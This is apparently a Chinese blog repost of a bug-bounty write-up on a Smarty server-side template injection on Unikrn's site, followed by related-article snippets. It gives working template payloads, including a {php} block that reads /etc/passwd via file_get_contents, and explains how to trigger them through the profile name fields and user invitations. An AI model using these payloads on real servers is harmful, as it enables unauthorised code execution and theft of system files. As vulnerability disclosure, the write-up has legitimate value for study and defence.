php模板注入漏洞,php的Smarty服务端模板注入,允许远程执行命令

最新推荐文章于 2023-04-27 00:22:18 发布
最新推荐文章于 2023-04-27 00:22:18 发布
阅读量457 收藏
点赞数
文章标签: php模板注入漏洞

1、漏洞简介

我在Unikrn的服务器上发现了一个漏洞:可以允许我执行‘file_get_contents ’函数,并且读取/etc/passwd文件的内容。

2、漏洞具体描述

这个服务器看起来后台使用的是php的smarty模板,当在用户选项中的firstname, lastname或者nickname中输入一个恶意的payload,然后邀请一个用户来加入这个网站,然后就会导致代码被执行。

Smarty简介

Smarty是一个使用PHP写出来的模板引擎,是目前业界最著名的PHP模板引擎之一。它分离了逻辑代码和外在的内容,提供了一种易于管理和使用的方法,用来将原本与HTML代码混杂在一起PHP代码逻辑分离。

简单的讲,目的就是要使PHP程序员同前端人员分离,使程序员改变程序的逻辑内容不会影响到前端人员的页面设计,前端人员重新修改页面不会影响到程序的程序逻辑,这在多人合作的项目中显的尤为重要。

3、漏洞测试

开始测试的时候,我使用的测试payload是{7*7},然后我收到了一封邮件,邮件内容是一个模板错误内容。

为了确认是否存在注入,我首先通过如下命令来确认当前使用的smarty版本:

{$smarty.version}

接下来我用如下命令来测试打印输出

{php}print"Hello"{/php}

最后,我利用file_get_contents函数来时读取/etc/pass文件,利用的命令是

{php}$s=file_get_contents('/etc/passwd',NULL,NULL,0,100);var_dump($s);{/php}

4、漏洞利用总结

一是编辑你的个人配置文件

二是在个人配置中的first name, last name以及user name中分别填入如下的测试payload

{php}$s=file_get_contents('/etc/passwd',NULL,NULL,0,100);var_dump($s);{/php}

三是开始邀请你的朋友加入网站

四是查看被邀请人的邮箱,你读取的文件已经被下载了

jx song
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Smarty模板引擎XSS漏洞的出现与防范分享
wusuopuBUPT的专栏
05-13 4786
-------- Smarty mobanyinXSS漏洞的出现与防范分享 出现情况 简单来说,在使用模板变量输出源码时,忽略了本该转义的url、html或js,若变量的值包含特殊格式或攻击者人为构造出特殊格式时出现。 若这些模板变量: 1.未进行url转义① 示例: 常见模板变量出现场景 源码
php 沙箱逃逸,PHP Smarty模版代码注入漏洞(CVE-2021-26120)
weixin_42317626的博客
03-28 1081
0x00漏洞概述CVE IDCVE-2021-26120时 间2021-02-26类 型代码注入等 级高危远程利用是影响范围PHP Smarty < 3.1.390x01漏洞详情Smarty是通过PHP开发的模板引擎,它分开了PHP逻辑代码与外观(HTML页)以便于管理。近日,PHP Smarty被披露存在2个PHP代码注入漏洞(CVE-2021-26120和CVE-2021-...
Smarty <= 3.1.32 PHP代码执行漏洞分析—【CVE-2017-1000480】
3569
01-24 1970
https://xianzhi.aliyun.com/forum/topic/1983 smarty简介 smarty是一个php模板引擎,其项目地址:https://github.com/smarty-php/smartysmarty据有模板编译功能。当访问一个模板文件时,smarty会根据模板文件在设置的编译目录中生成对应的php脚本(即编译文件),此后若再次访问该模板文件时
smarty3 php代码,Smarty3远程代码执行漏洞
weixin_39888080的博客
03-11 454
漏洞概要缺陷编号:WooYun-2011-02648漏洞标题:Smarty3远程代码执行漏洞相关厂商:Smarty漏洞作者:BNE提交时间:2011-08-08 14:51公开时间:2011-08-08 15:04漏洞类型:网络设计缺陷/逻辑错误危害等级:高自评Rank:15漏洞状态:未联系到厂商或者厂商积极忽略Tags标签:漏洞详情披露状态:2011-08-08: 积极联系厂商并且等待厂商认领中...
深信服长沙php,PHP Smarty 模版沙箱逃逸漏洞CVE-2021-26119
weixin_32382335的博客
03-27 776
PHP Smarty 模版沙箱逃逸漏洞CVE-2021-261192021-02-25 23:40:03136sangfor组件介绍smarty是一个基于PHP开发的PHP模板引擎。它提供了逻辑与外在内容的分离,简单的讲,目的就是要使用PHP程序员同美工分离,使用的程序员改变程序的逻辑内容不会影响到美工的页面设计,美工重新修改页面不会影响到程序的程序逻辑,这在多人合作的项目中 显的尤为重要。漏洞描...
基于SmartyPHP模板引擎设计源码
最新发布
04-04
本设计源码提供了一个基于SmartyPHP模板引擎。项目包含1112个文件,主要使用PHP和Shell编程语言。文件类型包括424个PHP源代码文件、409个Smarty模板文件、244个GIT忽略文件、12个配置文件、6个TXT文档、4个...
Smarty PHP模板引擎 v3.1.34
08-22
2. **预处理和编译**:Smarty会预先处理模板,将其转换为PHP代码并缓存,提高了执行效率。这意味着模板只需编译一次,除非源文件发生变化。 3. **安全**:Smarty提供了一些内置的安全机制,如自动转义HTML实体,以...
PHP文件缓存smarty模板应用实例分析
10-22
主要介绍了PHP文件缓存smarty模板应用方法,结合实例形式较为详细的分析了smarty模板缓存的相关使用技巧,需要的朋友可以参考下
PHP模板引擎smarty详细介绍
10-24
2. **编译型**:Smarty模板在首次运行时会被编译为PHP文件,之后的请求会直接跳过模板解析,直接执行编译后的PHP文件,提高了效率。 3. **缓存技术**:Smarty支持缓存功能,可以将最终的HTML输出保存为静态文件,当...
PHP模板注入Smarty模板
qq_45521281的博客
07-24 9587
Smarty是一个PHP模板引擎,提供让程序逻辑与页面显示(HTML/CSS)代码分离的功能。对于该框架的SSTI漏洞很多文章往往只是一笔带过,讲解的重心往往在flask等框架上。本篇文章结合一道CTF题目对Smarty的SSTI漏洞进行了一定的分析。题目地址:https://buuoj.cn/challenges CISCN2019华东南赛区Web11 基本信息 题目模拟了一个获取IP的API,并且可以在最下方看到“Build With Smarty !”可以确定页面使用的是Smarty模板引擎。 题
PHP Smarty模版注入
E1even的博客
06-21 1668
文章目录简介:常用标签:{php}:{literal} 标签调用静态方法(没遇到过 不是很理解这个playload){if}:总结: 简介: Smarty是基于PHP开发的,对于Smarty的SSTI的利用手段与常见的flask的SSTI有很大区别。 了解过Jinjia2模板注入的同学应该知道,jinjia2是基于python的,而Smarty是基于PHP的,所以理解起来还是很容易,我们只需要达到命令执行就可以了。 常用标签: {php}: Smarty支持使用{php}{/php}标签来执行被包裹其中的p
thinkphp 需要注意的一些漏洞(可能已经修复,此处仅是学习)
houzhyan-博客
04-11 3649
部分内容摘自网络。看完之后受益匪浅,和大家分享 之前发过关于thinkphp的一个ip获取漏洞,官方木有反应 http://www.thinkphp.cn/bug/2756.html 于是就考虑到官方的关于web中的sql注入过滤的问题是否也是非常马虎。 看来几篇文章,发现确实这个thinkphp 框架写的不怎么样。对于安全问题视而不见。以下部分内容摘自网络以及本人测试 测试:下载thi
详解模板注入漏洞(上)
程序猿DD
01-06 2081
作者 | 原作者gosecure,翻译整理shan66来源 |http://gosecure.github.io/1.简介所谓模板注入,又称服务器端模板注入(SSTI),是2015年出...
php模板注入漏洞,74CMS前台模板引擎注入漏洞漏洞复现
weixin_32000561的博客
04-15 508
74CMS 曝高危漏洞,攻击者只需注册会员账号,上传一份包含恶意内容的简历,即可控制网站服务器,进行任意操作。漏洞复现.jpg74CMS 又称 “骑士 CMS ”,是一项以 PHP 和 MySQL 为核心开发的一套免费并开源的专业人才网站系统。软件具有执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。74CMS 多应用于大型人才招聘网站,网站中通常会含有大量会员个人简历等私密信息,因此,该...
[CISCN 2019华东南]Web11 和[NISACTF 2022]midlevel
Leaf_initial的博客
04-27 308
Smarty是基于PHP开发的,对于Smarty的SSTI的利用手段与常见的flask的SSTI有很大区别。了解过Jinjia2模板注入的同学应该知道,jinjia2是基于python的,而Smarty是基于PHP的,所以理解起来还是很容易,我们只需要达到命令执行就可以了。
服务器端模板注入(SSTI)详解
键盘的起始页
01-11 1605
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。 模板引擎也会提供沙箱机制来进行漏洞防范,但是可以用沙箱逃逸技术来进行绕过。
PHP中的SSTI模板注入——Twig、Smarty、Blade
m0_61506558的博客
10-13 1573
最近接触到了SSTI注入的考点,里面涉及的内容比较杂,和SQL注入一样,影响的面较广,打算先从PHP模块注入开始,一步步深入学习。(一)TwigTwig是来自于Symfony的模版引擎,它非常易于安装和使用。Twig使用一个加载器 loader(Twig_Loader_Array) 来定位模板,以及一个环境变量environment(Twig_Environment) 来存储配置信息。
phpsmart模板技术入门教程.doc
01-12
1. 高效性能:PHPSmart利用编译型设计,将模板在运行时编译成非模板化的PHP代码,这使得后续的网页请求可以直接转化为已经编译好的文件,避免了每次请求时都需要重新解析模板,从而大大提高执行速度。 2. 缓存优化...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值